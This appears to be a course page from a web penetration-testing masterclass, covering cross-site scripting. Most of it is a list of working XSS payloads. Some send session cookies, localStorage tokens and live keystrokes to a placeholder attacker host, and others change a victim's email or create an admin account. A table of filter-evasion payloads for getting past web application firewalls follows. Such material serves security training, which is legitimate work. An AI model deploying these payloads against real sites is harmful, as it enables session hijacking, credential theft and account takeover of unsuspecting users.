Web Application Penetration Testing Complete Masterclass
🌐 Web Pentest · Both
Beginner
16 modules
2.7h
0 enrolled
From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.
Instructor
lazyhackers
Curriculum — 5 sections · 16 modules · 2.7h
// BEYOND alert(1) — WHAT XSS CAN ACTUALLY DO
- Steal session cookies → full account takeover without knowing password
- Capture keystrokes → steal passwords as victim types them in real time
- Perform actions as victim → CSRF via XSS bypasses SameSite cookie protection
- Exfiltrate localStorage/sessionStorage JWT tokens
- Port scan internal network from victim's browser
- Redirect to phishing page with identical UI
High-Impact XSS Payloads
# ── SESSION THEFT ─────────────────────────────────────────────────
<script>
new Image().src = 'https://attacker.com/steal?c=' + btoa(document.cookie);
</script>
# ── LOCALSTORAGE THEFT (JWT tokens often stored here) ─────────────
<script>
fetch('https://attacker.com/steal?ls=' + btoa(JSON.stringify(localStorage)));
</script>
# ── KEYLOGGER ─────────────────────────────────────────────────────
<script>
document.addEventListener('keypress', function(e) {
fetch('https://attacker.com/keys?k=' + e.key + '&url=' + location.href);
});
</script>
# ── ACCOUNT TAKEOVER via CSRF+XSS (changes victim's email) ────────
<script>
fetch('/api/account/update', {
method: 'POST', credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email: '[email protected]' })
});
</script>
# ── CREATE ADMIN USER via STORED XSS (when admin views infected page) ──
<script>
fetch('/admin/users/create', {
method: 'POST', credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({username:'hacker',password:'P@ss123',role:'admin'})
});
</script>
WAF Bypass Techniques
| Bypass Payload | Filter Bypassed | Why It Works |
|---|---|---|
| <ScRiPt>alert(1)</sCrIpT> | Case-sensitive filter | HTML is case-insensitive — browser normalizes, WAF misses |
| <img src=x> | Keyword "alert" blocked | HTML entity encoding decoded by browser before execution |
| eval(atob('YWxlcnQoMSk=')) | alert() blocked | Base64 decoded at runtime — WAF sees only harmless base64 |
| <details open> | script tag blocked | HTML5 event on non-script element — most WAFs miss this |
| <svg/onload=alert(1)> | Space-based filter | Slash as attribute separator — no space required |
| <img src=1> | Parentheses blocked | Template literal syntax — no () needed |
| <script>window['ale'+'rt'](1)</script> | "alert" keyword blocked | String concatenation — evaluated at runtime |